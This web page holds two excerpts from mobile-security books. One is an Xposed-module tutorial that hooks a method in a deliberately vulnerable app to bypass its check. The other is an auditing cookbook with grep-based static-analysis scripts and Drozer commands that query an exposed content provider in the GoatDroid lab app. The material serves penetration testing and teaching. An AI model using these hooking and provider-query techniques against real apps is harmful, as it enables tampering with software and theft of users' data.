
How-To Tutorials - Security


Hacking Android Apps Using the Xposed Framework

Packt
13 Jul 2016
6 min read
In this article by Srinivasa Rao Kotipalli and Mohammed A. Imran, authors of Hacking Android, we will discuss Android security, one of the most prominent emerging topics today. Attacks on mobile devices can be categorized in various ways, such as exploiting vulnerabilities in the kernel, attacking vulnerable apps, tricking users into downloading and running malware that steals personal data from the device, and running misconfigured services on the device. OWASP has also released the Mobile Top 10 list, helping the community better understand mobile security as a whole. Although it is hard to cover much in a single article, let's look at an interesting topic: the runtime manipulation of Android applications. Runtime manipulation is controlling application flow at runtime. There are multiple tools and techniques out there for performing runtime manipulation on Android. This article discusses using the Xposed framework to hook onto Android apps.

Let's begin! Xposed is a framework that enables developers to write custom modules for hooking onto Android apps and thus modifying their flow at runtime. It was released by rovo89 in 2012. It works by placing a modified app_process binary in the /system/bin/ directory, replacing the original. app_process is the binary responsible for starting the zygote process: when an Android phone is booted, init runs /system/bin/app_process and gives the resulting process the name Zygote. Using the Xposed framework, we can hook onto any process that is forked from the Zygote process.

To demonstrate the capabilities of the Xposed framework, I have developed a custom vulnerable application. The package name of the vulnerable app is com.androidpentesting.hackingandroidvulnapp1. The application has a method, setOutput, that is called when the button is clicked. When setOutput is called, the value of i is passed to it as an argument. Notice that i is initialized to 0. Inside the setOutput function, there is a check to see whether the value of i is equal to 1. If it is, the application displays the text Cracked. But since the initialized value is 0, this app always displays the text You cant crack it.
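The original code screenshot is not reproduced here, so the following is a minimal sketch of the logic just described; the class, layout, and widget names are illustrative, not taken from the book:

import android.app.Activity;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.Toast;

public class MainActivity extends Activity {

    // i is initialized to 0, so the check in setOutput() never passes
    int i = 0;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        Button crackMe = (Button) findViewById(R.id.btnCrackMe);
        crackMe.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View v) {
                setOutput(i); // the value of i is passed when the button is clicked
            }
        });
    }

    void setOutput(int i) {
        if (i == 1) {
            Toast.makeText(this, "Cracked", Toast.LENGTH_LONG).show();
        } else {
            Toast.makeText(this, "You cant crack it", Toast.LENGTH_LONG).show();
        }
    }
}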
Running the application in an emulator confirms that the You cant crack it message is always shown.

Now, our goal is to write an Xposed module that modifies the functionality of this app at runtime and thus prints the text Cracked. First, download and install the Xposed APK file in your emulator. Xposed can be downloaded from the following link:

http://dl-xda.xposed.info/modules/de.robv.android.xposed.installer_v32_de4f0d.apk

Install the downloaded APK file using the following command:

adb install [file name].apk

Once you've installed this app, launch it. At this stage, make sure that you have everything set up before you proceed. Once you are done with the setup, navigate to the Modules tab, where all installed Xposed modules are shown; at this point we don't have any modules installed.

We will now create a new module to achieve the goal of printing the text Cracked in the target application shown earlier. We use Android Studio to develop this custom module. Here is the step-by-step procedure:

1. Create a new project in Android Studio by choosing the Add No Activity option. I named it XposedModule.
2. Add the XposedBridgeAPI library so that we can use Xposed-specific methods within the module. Download the library from the following link: http://forum.xda-developers.com/attachment.php?attachmentid=2748878&d=1400342298
3. Create a folder called provided within the app directory and place this library inside the provided directory.
4. Create a folder called assets inside the app/src/main/ directory, and create a new file called xposed_init. We will add contents to this file in a later step.
5. Open the build.gradle file under the app folder, and add the following line under the dependencies section:
   provided files('provided/[file name of the Xposed library.jar]')
6. Create a new class and name it XposedClass.
7. Open the xposed_init file that we created earlier, and place the following content in it:
   com.androidpentesting.xposedmodule.XposedClass
8. Provide some information about the module by adding the following content to the application section of AndroidManifest.xml:
   <meta-data android:name="xposedmodule" android:value="true" />
   <meta-data android:name="xposeddescription" android:value="xposed module to bypass the validation" />
   <meta-data android:name="xposedminversion" android:value="54" />
9. Finally, write the actual code within XposedClass to add a hook. Here is the piece of code that actually bypasses the validation being done in the target application:
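The original listing appears as a screenshot in the source, so what follows is a reconstruction assembled from the bullet-point description below; the hooked class name (MainActivity) is an assumption, while the rest follows the standard Xposed API:

package com.androidpentesting.xposedmodule;

import de.robv.android.xposed.IXposedHookLoadPackage;
import de.robv.android.xposed.XC_MethodHook;
import de.robv.android.xposed.XposedBridge;
import de.robv.android.xposed.XposedHelpers;
import de.robv.android.xposed.callbacks.XC_LoadPackage.LoadPackageParam;

public class XposedClass implements IXposedHookLoadPackage {

    @Override
    public void handleLoadPackage(LoadPackageParam lpparam) throws Throwable {
        // Class and method inside the target app that we want to hook
        final String classToHook = "com.androidpentesting.hackingandroidvulnapp1.MainActivity";
        final String functionToHook = "setOutput";

        // Act only when the vulnerable app's package is loaded
        if (lpparam.packageName.equals("com.androidpentesting.hackingandroidvulnapp1")) {
            XposedHelpers.findAndHookMethod(classToHook, lpparam.classLoader,
                    functionToHook, int.class, new XC_MethodHook() {
                        @Override
                        protected void beforeHookedMethod(MethodHookParam param) throws Throwable {
                            // Force the argument i to 1 so the app shows "Cracked"
                            param.args[0] = 1;
                            XposedBridge.log("Hooked setOutput; i set to 1");
                        }
                    });
        }
    }
}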
Here's what we have done in the previous code:

- Our class implements IXposedHookLoadPackage
- We wrote the implementation for the handleLoadPackage method; this is mandatory when we implement IXposedHookLoadPackage
- We set up the string values for classToHook and functionToHook
- An if condition checks whether the package name equals the target package name
- If the package name matches, the custom code provided inside beforeHookedMethod is executed
- Within beforeHookedMethod, we set the value of i to 1; thus, when the button is clicked, the value of i is considered to be 1, and the text Cracked is displayed as a toast message

Compile and run this application just like any other Android app, and then check the Modules section of the Xposed application. You should see a new module with the name XposedModule. Select the module and reboot the emulator. Once the emulator has restarted, run the target application and click on the Crack Me button: the application's functionality has been modified at runtime, without actually modifying its original code.

We can also see the logs by tapping on the Logs section. Notice the XposedBridge.log method in the source code shown previously; this is the method used to log the data shown there.

Summary

Xposed is, without a doubt, one of the best frameworks available out there. Understanding frameworks such as Xposed is essential to understanding Android application security. This article demonstrated the capabilities of the Xposed framework to manipulate apps at runtime. A lot of other interesting things can be done using Xposed, such as bypassing root detection and SSL pinning.

Further resources on this subject:

- Speeding up Gradle builds for Android
- Incident Response and Live Analysis (https://www.packtpub.com/books/content/incident-response-and-live-analysis)
- Mobile Forensics


Auditing Mobile Applications

Packt
08 Jul 2016
48 min read
In this article by Prashant Verma and Akshay Dikshit, authors of the book Mobile Device Exploitation Cookbook, we will cover the following topics:

- Auditing Android apps using static analysis
- Auditing Android apps using a dynamic analyzer
- Using Drozer to find vulnerabilities in Android applications
- Auditing iOS applications using static analysis
- Auditing iOS applications using a dynamic analyzer
- Examining iOS App Data storage and Keychain security vulnerabilities
- Finding vulnerabilities in WAP-based mobile apps
- Finding client-side injection
- Insecure encryption in mobile apps
- Discovering data leakage sources
- Other application-based attacks in mobile devices
- Launching intent injection in Android

Mobile applications, like web applications, may have vulnerabilities. These vulnerabilities are in most cases the result of bad programming practices or insecure coding techniques, or of purposefully injected bad code. For users and organizations, it is important to know how vulnerable their applications are. Should they fix the vulnerabilities or keep/stop using the applications? To address this dilemma, mobile applications need to be audited with the goal of uncovering vulnerabilities. Mobile applications (Android, iOS, or other platforms) can be analyzed using static or dynamic techniques. Static analysis is conducted by employing certain text- or string-based searches across decompiled source code. Dynamic analysis is conducted at runtime, and vulnerabilities are uncovered in simulated fashion. Dynamic analysis is difficult compared to static analysis. In this article, we will employ both static and dynamic analysis to audit Android and iOS applications. We will also learn various other audit techniques, including Drozer framework usage, WAP-based application audits, and typical mobile-specific vulnerability discovery.

Auditing Android apps using static analysis

Static analysis is the most commonly and easily applied analysis method in source code audits. Static by definition means something that is constant. Static analysis is conducted on static code, that is, raw or decompiled source code or compiled (object) code, but the analysis is conducted without the runtime. In most cases, static analysis becomes code analysis via static string searches. A very common scenario is to figure out vulnerable or insecure code patterns and find the same across the entire application code.

Getting ready

For conducting static analysis of Android applications, we need at least one Android application and a static code scanner. Pick any Android application of your choice and use any static analyzer tool of your choice. In this recipe, we use Insecure Bank, a vulnerable Android application for Android security enthusiasts. We will also use ScriptDroid, a static analysis script. Both Insecure Bank and ScriptDroid are coded by Android security researcher Dinesh Shetty.

How to do it...

Perform the following steps:

1. Download the latest version of the Insecure Bank application from GitHub.
2. Decompress or unzip the .apk file and note the path of the unzipped application.
3. Create a ScriptDroid.bat file by using the following code:

@ECHO OFF
SET /P Filelocation=Please Enter Location:
mkdir %Filelocation%OUTPUT

:: Code to check for presence of comments
grep -H -i -n -e "//" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_comment.txt"
type "%Filelocation%*.java" | gawk "/\/\*/,/\*\//" >> "%Filelocation%OUTPUT\MultilineComments.txt"
grep -H -i -n -v "TODO" "%Filelocation%OUTPUT\Temp_comment.txt" >> "%Filelocation%OUTPUT\SinglelineComments.txt"
del %Filelocation%OUTPUT\Temp_comment.txt

:: Code to check for insecure usage of SharedPreferences
grep -H -i -n -C2 -e "putString" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\verify_sharedpreferences.txt"
grep -H -i -n -C2 -e "MODE_PRIVATE" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Modeprivate.txt"
grep -H -i -n -C2 -e "MODE_WORLD_READABLE" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Worldreadable.txt"
grep -H -i -n -C2 -e "MODE_WORLD_WRITEABLE" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Worldwritable.txt"
grep -H -i -n -C2 -e "addPreferencesFromResource" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\verify_sharedpreferences.txt"

:: Code to check for possible TapJacking attack
grep -H -i -n -e filterTouchesWhenObscured="true" "%Filelocation%..\..\..\..\res\layout\*.xml" >> "%Filelocation%OUTPUT\Temp_tapjacking.txt"
grep -H -i -n -e "<Button" "%Filelocation%..\..\..\..\res\layout\*.xml" >> "%Filelocation%OUTPUT\tapjackings.txt"
grep -H -i -n -v filterTouchesWhenObscured="true" "%Filelocation%OUTPUT\tapjackings.txt" >> "%Filelocation%OUTPUT\Temp_tapjacking.txt"
del %Filelocation%OUTPUT\Temp_tapjacking.txt

:: Code to check usage of external storage card for storing information
grep -H -i -n -e "WRITE_EXTERNAL_STORAGE" "%Filelocation%..\..\..\..\AndroidManifest.xml" >> "%Filelocation%OUTPUT\SdcardStorage.txt"
grep -H -i -n -e "getExternalStorageDirectory()" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\SdcardStorage.txt"
grep -H -i -n -e "sdcard" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\SdcardStorage.txt"

:: Code to check for possible JavaScript injection
grep -H -i -n -e "addJavascriptInterface()" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_probableXss.txt"
grep -H -i -n -e "setJavaScriptEnabled(true)" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_probableXss.txt"
grep -H -i -n -v "import" "%Filelocation%OUTPUT\Temp_probableXss.txt" >> "%Filelocation%OUTPUT\probableXss.txt"
del %Filelocation%OUTPUT\Temp_probableXss.txt

:: Code to check for presence of possible weak algorithms
grep -H -i -n -e "MD5" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_weakencryption.txt"
grep -H -i -n -e "base64" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_weakencryption.txt"
grep -H -i -n -e "des" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_weakencryption.txt"
grep -H -i -n -v "import" "%Filelocation%OUTPUT\Temp_weakencryption.txt" >> "%Filelocation%OUTPUT\Weakencryption.txt"
del %Filelocation%OUTPUT\Temp_weakencryption.txt

:: Code to check for weak transport medium
grep -H -i -n -C3 "http://" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_overhttp.txt"
grep -H -i -n -C3 -e "HttpURLConnection" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_overhttp.txt"
grep -H -i -n -C3 -e "URLConnection" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_OtherUrlConnection.txt"
grep -H -i -n -C3 -e "URL" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_OtherUrlConnection.txt"
grep -H -i -n -e "TrustAllSSLSocket-Factory" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\BypassSSLvalidations.txt"
grep -H -i -n -e "AllTrustSSLSocketFactory" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\BypassSSLvalidations.txt"
grep -H -i -n -e "NonValidatingSSLSocketFactory" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\BypassSSLvalidations.txt"
grep -H -i -n -v "import" "%Filelocation%OUTPUT\Temp_OtherUrlConnection.txt" >> "%Filelocation%OUTPUT\OtherUrlConnections.txt"
del %Filelocation%OUTPUT\Temp_OtherUrlConnection.txt
grep -H -i -n -v "import" "%Filelocation%OUTPUT\Temp_overhttp.txt" >> "%Filelocation%OUTPUT\UnencryptedTransport.txt"
del %Filelocation%OUTPUT\Temp_overhttp.txt

:: Code to check for autocomplete ON
grep -H -i -n -e "<Input" "%Filelocation%..\..\..\..\res\layout\*.xml" >> "%Filelocation%OUTPUT\Temp_autocomp.txt"
grep -H -i -n -v "textNoSuggestions" "%Filelocation%OUTPUT\Temp_autocomp.txt" >> "%Filelocation%OUTPUT\AutocompleteOn.txt"
del %Filelocation%OUTPUT\Temp_autocomp.txt

:: Code to check for presence of possible SQL content
grep -H -i -n -e "rawQuery" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "compileStatement" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "db" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "sqlite" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "database" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "insert" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "delete" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "select" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "table" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -e "cursor" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_sqlcontent.txt"
grep -H -i -n -v "import" "%Filelocation%OUTPUT\Temp_sqlcontent.txt" >> "%Filelocation%OUTPUT\Sqlcontents.txt"
del %Filelocation%OUTPUT\Temp_sqlcontent.txt

:: Code to check for logging mechanism
grep -H -i -n -F "Log." "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Logging.txt"

:: Code to check for information in Toast messages
grep -H -i -n -e "Toast.makeText" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_Toast.txt"
grep -H -i -n -v "//" "%Filelocation%OUTPUT\Temp_Toast.txt" >> "%Filelocation%OUTPUT\Toast_content.txt"
del %Filelocation%OUTPUT\Temp_Toast.txt

:: Code to check for debugging status
grep -H -i -n -e "android:debuggable" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\DebuggingAllowed.txt"

:: Code to check for presence of device identifiers
grep -H -i -n -e "uid|user-id|imei|deviceId|deviceSerialNumber|devicePrint|X-DSN|phone |mdn|did|IMSI|uuid" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\Temp_Identifiers.txt"
grep -H -i -n -v "//" "%Filelocation%OUTPUT\Temp_Identifiers.txt" >> "%Filelocation%OUTPUT\Device_Identifier.txt"
del %Filelocation%OUTPUT\Temp_Identifiers.txt

:: Code to check for presence of location info
grep -H -i -n -e "getLastKnownLocation()|requestLocationUpdates()|getLatitude()|getLongitude()|LOCATION" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\LocationInfo.txt"

:: Code to check for possible intent injection
grep -H -i -n -C3 -e "Action.getIntent(" "%Filelocation%*.java" >> "%Filelocation%OUTPUT\IntentValidation.txt"

How it works...

Go to the command prompt and navigate to the path where ScriptDroid is placed. Run the .bat file; it prompts you to input the path of the application you wish to analyze. In our case, we provide it with the path of the Insecure Bank application, precisely the path where the Java files are stored. The script generates a folder by the name OUTPUT in the path where the Java files of the application are present. The OUTPUT folder contains multiple text files, each corresponding to a particular vulnerability. The individual text files pinpoint the location of vulnerable code pertaining to the vulnerability under discussion.

The combination of ScriptDroid and Insecure Bank gives a very nice view of various Android vulnerabilities; usually the same is not possible with live apps. Consider the following points, for instance:

- Weakencryption.txt lists the instances of Base64 encoding used for passwords in the Insecure Bank application
- Logging.txt contains the list of insecure log functions used in the application
- SdcardStorage.txt contains the code snippets pertaining to data storage on SD cards

Details like these from static analysis are eye-openers in letting us know of the vulnerabilities in our application, without even running the application.
There's more...

The current recipe used just ScriptDroid, but there are many other options available. You can either write your own script or use one of the free or commercial tools. A few commercial tools have pioneered the static analysis approach over the years via their dedicated focus.

See also

- https://github.com/dineshshetty/Android-InsecureBankv2
- Auditing iOS application using static analysis

Auditing Android apps using a dynamic analyzer

Dynamic analysis is another technique applied in source code audits. Dynamic analysis is conducted at runtime: the application is run or simulated, and flaws or vulnerabilities are discovered while the application is running. Dynamic analysis can be tricky, especially in the case of mobile platforms. As opposed to static analysis, dynamic analysis has certain requirements, such as the analyzer environment needing to be a runtime or a simulation of the real runtime. Dynamic analysis can be employed to find vulnerabilities in Android applications that are difficult to find via static analysis. A static analysis may let you know that a password is going to be stored, but dynamic analysis reads the memory and reveals the password stored at runtime. Dynamic analysis is also helpful in tampering with data in transmission during runtime, for example, tampering with the amount in a transaction request being sent to a payment gateway. Some Android applications employ obfuscation to prevent attackers from reading the code; dynamic analysis changes the whole game in such cases, by revealing the hardcoded data being sent out in requests, which is otherwise not readable in static analysis.

Getting ready

For conducting dynamic analysis of Android applications, we need at least one Android application and a dynamic code analyzer tool. Pick any Android application of your choice and use any dynamic analyzer tool of your choice. Dynamic analyzer tools fall into two categories:

- Tools that run on a computer and connect to an Android device or emulator (to conduct dynamic analysis)
- Tools that run on the Android device itself

For this recipe, we choose a tool belonging to the latter category.

How to do it...

Perform the following steps for conducting dynamic analysis:

1. Have an Android device with the applications (to be analyzed dynamically) installed.
2. Go to the Play Store and download Andrubis. Andrubis is a tool from iSecLabs which runs on Android devices and conducts static, dynamic, and URL analysis on installed applications. We will use it for dynamic analysis only in this recipe.
3. Open the Andrubis application on your Android device. It displays the applications installed on the device and analyzes them.

How it works...

Open the analysis of the application of your interest. Andrubis computes an overall malice score (out of 10) for each application and shows a colored icon in front of it on its main screen to flag vulnerable applications. We selected an orange-colored application to make more sense of this recipe.

Navigate to the Dynamic Analysis tab and check the results. The results are interesting for this application: all the files that the application under dynamic analysis is going to write are listed. In our case, one preferences.xml is located. Though the fact that the application is going to create a preferences file could have been found in static analysis as well, dynamic analysis additionally confirmed that such a file is indeed created. It also confirms that the code snippet found in static analysis about the creation of a preferences file is not dormant code but results in a file that is actually created. Further, go ahead and read the created file and look for any sensitive data present there. Who knows, luck may strike and give you a key to hidden treasure. Notice that the first screen has a hyperlink, View full report in browser. Tap on it and the detailed dynamic analysis is presented for your further review. This also lets you understand what the tool tried and what response it got.

There's more...

The current recipe used a dynamic analyzer belonging to the latter category. There are many other tools available in the former category. Since this is the Android platform, many of them are open source tools. DroidBox can be tried for dynamic analysis. It looks for file operations (read/write), network data traffic, SMS, permissions, broadcast receivers, and so on, among other checks. Hooker is another tool that can intercept and modify API calls initiated by the application; this is very useful in dynamic analysis. Try hooking and tampering with data in API calls.

See also

- https://play.google.com/store/apps/details?id=org.iseclab.andrubis
- https://code.google.com/p/droidbox/
- https://github.com/AndroidHooker/hooker

Using Drozer to find vulnerabilities in Android applications

Drozer is a mobile security audit and attack framework, maintained by MWR InfoSecurity. It is a must-have tool in the tester's armory. Drozer (an Android application installed on the device) interacts with other Android applications via IPC (Inter-Process Communication). It allows fingerprinting of application package-related information and the application's attack surface, and attempts to exploit those. Drozer is an attack framework, and advanced exploits can be conducted from it. We use Drozer to find vulnerabilities in our applications.

Getting ready

Install Drozer by downloading it from https://www.mwrinfosecurity.com/products/drozer/ and follow the installation instructions mentioned in the user guide. Install the Drozer console agent and start a session as mentioned in the user guide. If your installation is correct, you should get the Drozer command prompt (dz>).
You should also have a few vulnerable applications to analyze. Here we chose the OWASP GoatDroid application.

How to do it...

Every pentest starts with fingerprinting. Let us use Drozer for the same. The Drozer User Guide is very helpful for looking up commands. The following command can be used to obtain information about an Android application package:

run app.package.info -a <package name>

We used it to extract the information from the GoatDroid application. Notice that apart from the general information about the application, user permissions are also listed by Drozer.

Further, let us analyze the attack surface. Drozer's attack surface lists the exposed activities, broadcast receivers, content providers, and services. Components that are exposed without good reason may be a critical security risk and may provide access to privileged content. Drozer has the following command to analyze the attack surface:

run app.package.attacksurface <package name>

We used it to obtain the attack surface of the Herd Financial application of GoatDroid: one activity and one content provider are exposed. We chose to attack the content provider to obtain the data stored locally. We used the following Drozer command to analyze the content provider of the same application:

run app.provider.info -a <package name>

This gave us the details of the exposed content provider, which we used in another Drozer command:

run scanner.provider.finduris -a <package name>

We could successfully query the content provider. Lastly, we would be interested in stealing the data stored by this content provider. This is possible via another Drozer command:

run app.provider.query content://<content provider details>/

How it works...

ADB is used to establish a connection between the Drozer Python server (present on the computer) and the Drozer agent (an .apk file installed on the emulator or Android device). The Drozer console is initialized to run the various commands we saw. The Drozer agent utilizes the Android OS feature of IPC to take over the role of the target application and run the various commands as the original application.

There's more...

Drozer not only allows users to obtain the attack surface and steal data via content providers or launch intent injection attacks; it goes way beyond that. It can be used to fuzz the application and cause local injection attacks by providing a way to inject payloads. Drozer can also be used to run various built-in exploits, and can be utilized to attack Android applications via custom-developed exploits. Further, it can also run in Infrastructure mode, allowing remote connections and remote attacks. A plain-Android sketch of what the provider query above does appears after the following links.

See also

- Launching intent injection in Android
- https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
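As an aside, Drozer's app.provider.query is essentially an ordinary ContentResolver query issued from a different app. A minimal sketch follows; the provider URI is hypothetical, standing in for the one found via scanner.provider.finduris:

import android.app.Activity;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;

public class ProviderProbeActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        // Hypothetical URI of an exported, unprotected content provider
        Uri uri = Uri.parse("content://com.example.target.provider/accounts");

        // Because the provider is exported without permissions,
        // any app on the device can read it
        Cursor c = getContentResolver().query(uri, null, null, null, null);
        if (c != null) {
            while (c.moveToNext()) {
                // Dump every column of every row, much as Drozer does
                for (int i = 0; i < c.getColumnCount(); i++) {
                    Log.d("Probe", c.getColumnName(i) + " = " + c.getString(i));
                }
            }
            c.close();
        }
    }
}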
Auditing iOS application using static analysis

Static analysis in source code reviews is an easier technique, and employing static string searches makes it convenient to use. Static analysis is conducted on the raw or decompiled source code or on the compiled (object) code, but the analysis is conducted outside of runtime. Usually, static analysis figures out vulnerable or insecure code patterns.

Getting ready

For conducting static analysis of iOS applications, we need at least one iOS application and a static code scanner. Pick any iOS application of your choice and use any static analyzer tool of your choice. We will use iOS-ScriptDroid, a static analysis script developed by Android security researcher Dinesh Shetty.

How to do it...

Keep the decompressed iOS application files handy and note the path of the folder containing the .m files. Create an iOS-ScriptDroid.bat file by using the following code:

ECHO Running ScriptDroid ...
@ECHO OFF
SET /P Filelocation=Please Enter Location:
:: SET Filelocation=Location of the folder containing all the .m files
mkdir %Filelocation%OUTPUT

:: Code to check for sensitive information storage in phone memory
grep -H -i -n -C2 -e "NSFile" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\phonememory.txt"
grep -H -i -n -e "writeToFile " "%Filelocation%*.m" >> "%Filelocation%OUTPUT\phonememory.txt"

:: Code to check for possible buffer overflow
grep -H -i -n -e "strcat(|strcpy(|strncat(|strncpy(|sprintf(|vsprintf(|gets(" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\BufferOverflow.txt"

:: Code to check for usage of URL schemes
grep -H -i -n -C2 "openUrl|handleOpenURL" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\URLSchemes.txt"

:: Code to check for possible JavaScript injection
grep -H -i -n -e "webview" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\probableXss.txt"

:: Code to check for presence of possible weak algorithms
grep -H -i -n -e "MD5" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\tweakencryption.txt"
grep -H -i -n -e "base64" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\tweakencryption.txt"
grep -H -i -n -e "des" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\tweakencryption.txt"
grep -H -i -n -v "//" "%Filelocation%OUTPUT\tweakencryption.txt" >> "%Filelocation%OUTPUT\weakencryption.txt"
del %Filelocation%OUTPUT\tweakencryption.txt

:: Code to check for weak transport medium
grep -H -i -n -e "http://" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\overhttp.txt"
grep -H -i -n -e "NSURL" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\OtherUrlConnection.txt"
grep -H -i -n -e "URL" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\OtherUrlConnection.txt"
grep -H -i -n -e "writeToUrl" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\OtherUrlConnection.txt"
grep -H -i -n -e "NSURLConnection" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\OtherUrlConnection.txt"
grep -H -i -n -C2 "CFStream" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\OtherUrlConnection.txt"
grep -H -i -n -C2 "NSStreamin" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\OtherUrlConnection.txt"
grep -H -i -n -e "setAllowsAnyHTTPSCertificate|kCFStreamSSLAllowsExpiredRoots|kCFStreamSSLAllowsExpiredCertificates" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\BypassSSLvalidations.txt"
grep -H -i -n -e "kCFStreamSSLAllowsAnyRoot|continueWithoutCredentialForAuthenticationChallenge" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\BypassSSLvalidations.txt"
:: to add: check for "didFailWithError"

:: Code to check for presence of possible SQL content
grep -H -i -F -e "db" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\sqlcontent.txt"
grep -H -i -F -e "sqlite" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\sqlcontent.txt"
grep -H -i -F -e "database" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\sqlcontent.txt"
grep -H -i -F -e "insert" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\sqlcontent.txt"
grep -H -i -F -e "delete" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\sqlcontent.txt"
grep -H -i -F -e "select" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\sqlcontent.txt"
grep -H -i -F -e "table" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\sqlcontent.txt"
grep -H -i -F -e "cursor" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\sqlcontent.txt"
grep -H -i -F -e "sqlite3_prepare" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\sqlcontent.txt"
grep -H -i -F -e "sqlite3_compile" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\sqlcontent.txt"

:: Code to check for presence of keychain usage source code
grep -H -i -n -e "kSecASttr|SFHFKkey" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\KeychainUsage.txt"

:: Code to check for logging mechanism
grep -H -i -n -F "NSLog" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\Logging.txt"
grep -H -i -n -F "XLog" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\Logging.txt"
grep -H -i -n -F "ZNLog" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\Logging.txt"

:: Code to check for presence of password in source code
grep -H -i -n -e "password|pwd" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\password.txt"

:: Code to check for debugging status
grep -H -i -n -e "#ifdef DEBUG" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\DebuggingAllowed.txt"

:: Code to check for presence of device identifiers (needs more work)
grep -H -i -n -e "uid|user-id|imei|deviceId|deviceSerialNumber|devicePrint|X-DSN|phone |mdn|did|IMSI|uuid" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\Temp_Identifiers.txt"
grep -H -i -n -v "//" "%Filelocation%OUTPUT\Temp_Identifiers.txt" >> "%Filelocation%OUTPUT\Device_Identifier.txt"
del %Filelocation%OUTPUT\Temp_Identifiers.txt

:: Code to check for presence of location info
grep -H -i -n -e "CLLocationManager|startUpdatingLocation|locationManager|didUpdateToLocation|CLLocationDegrees|CLLocation|CLLocationDistance|startMonitoringSignificantLocationChanges" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\LocationInfo.txt"

:: Code to check for presence of comments
grep -H -i -n -e "//" "%Filelocation%*.m" >> "%Filelocation%OUTPUT\Temp_comment.txt"
type "%Filelocation%*.m" | gawk "/\/\*/,/\*\//" >> "%Filelocation%OUTPUT\MultilineComments.txt"
grep -H -i -n -v "TODO" "%Filelocation%OUTPUT\Temp_comment.txt" >> "%Filelocation%OUTPUT\SinglelineComments.txt"
del %Filelocation%OUTPUT\Temp_comment.txt

How it works...

Go to the command prompt and navigate to the path where iOS-ScriptDroid is placed. Run the batch file; it prompts you to input the path of the application for which you wish to perform static analysis. In our case, we arbitrarily chose an application and input the path of its implementation (.m) files. The script generates a folder by the name OUTPUT in the path where the .m files of the application are present. The OUTPUT folder contains multiple text files, each corresponding to a particular vulnerability. The individual text files pinpoint the location of vulnerable code pertaining to the vulnerability under discussion.

